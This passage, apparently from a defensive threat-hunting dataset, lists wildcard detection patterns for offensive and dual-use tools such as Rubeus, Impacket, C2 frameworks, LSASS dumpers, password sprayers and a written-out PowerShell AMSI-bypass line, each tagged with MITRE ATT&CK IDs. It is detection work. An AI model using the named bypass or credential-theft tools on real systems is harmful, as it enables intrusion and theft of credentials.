-*Asreproast.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*ASREPRoast.ps1*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*asreproast_*.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*asreproast_john_results_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*asreproast_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ASreproasting.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*ASRepToHashcat*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*Assemblies/SharpMove.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*assembly *.asm *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*assembly *.exe *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*,offensive_tool_keyword,AD exploitation cheat sheet,PowerShell AMSI Bypass,T1548 T1562 T1027,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assembly_inject -*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - 
T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*--assemblyargs AntiVirus AppLocker*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*Assets/solution/dllmain.cpp*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*AssmblyLoader*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*assoc *findstr *=cm*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr *lCmd*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr 
*mdf*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr *s1x*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr =cm*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr lCmd*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr mdf*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*assoc *findstr s1x*,greyware_tool_keyword,assoc,will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AsStrongAsFuck.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z 
-*AsStrongAsFuck.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*async_webshell-all.py*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*AsyncRAT/DCRat*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*asyncssh_commander.py *,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*asyncssh_commander.py*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*AteraAgent*AgentPackageRunCommandInteractive.exe*,greyware_tool_keyword,Atera,control remote machines- abused by threat actors,T1021.001 - 
T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*atexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Athena.Forwarders.SMB*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*athena/agent_code/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*AthenaPlugins.csproj*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*AtlasC2*APIModels*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2*Client*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2*implant*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2*TeamServer*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2.exe*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - 
T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2b.exe*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasC2b.sln*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasImplant.yar*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*AtlasReaper.exe*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*AtlasReaper-main*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - 
TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*atmail2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*atomizer imap *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer lync *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer owa *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py -*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py imap *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. 
OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py lync *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*atomizer.py owa *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*AtomLdr.dll*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*AtomLdr.sln*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*AtomLdr.vcxproj*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 
- TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*AtomLdr-main.zip*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*ATPMiniDump*,offensive_tool_keyword,ATPMiniDump,Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis,T1003 - T1005 - T1055 - T1218,TA0006 - TA0008 - TA0011,N/A,N/A,Credential Access,https://github.com/b4rtik/ATPMiniDump,1,1,N/A,N/A,3,253,53,2019-12-02T15:01:22Z,2019-11-29T19:49:54Z -*--attack nightmare*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*--attack spoolsample*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*Attack_AmsiOpenSession.ps1*,offensive_tool_keyword,Amsi_Bypass,Amsi Bypass payload that works on Windwos 11,T1055 - T1055.012 - T1562 - 
T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/senzee1984/Amsi_Bypass_In_2023,1,1,N/A,8,3,275,48,2023-07-30T19:17:23Z,2023-07-30T16:14:19Z -*Attack_AmsiScanBuffer.ps1*,offensive_tool_keyword,Amsi_Bypass,Amsi Bypass payload that works on Windwos 11,T1055 - T1055.012 - T1562 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/senzee1984/Amsi_Bypass_In_2023,1,1,N/A,8,3,275,48,2023-07-30T19:17:23Z,2023-07-30T16:14:19Z -*--attacker-page *,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,0,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*AttackerSetup(windows).exe*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*AttackerSetup.py*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*AttackerSetup4linux*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. 
This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*AttackSurfaceMapper-master*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,1,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*AttackTeamFamily*-bof-toolset*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Attempted to spawn a socks proxy server at 0.0.0.0:*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral 
Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Attempting connection from 0.0.0.0:*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*AttifyOS*,offensive_tool_keyword,attifyos,AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.,T1559 - T1565 - T1210 - T1189 - T1110,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/adi0x90/attifyos,1,0,N/A,N/A,9,871,159,2021-08-26T13:31:13Z,2017-07-17T01:40:25Z -*attrib +s +h desktop.ini*,greyware_tool_keyword,attrib,NTLM Leak via Desktop.ini,T1555.003 - T1081.001,TA0006 - TA0007,N/A,N/A,Credential 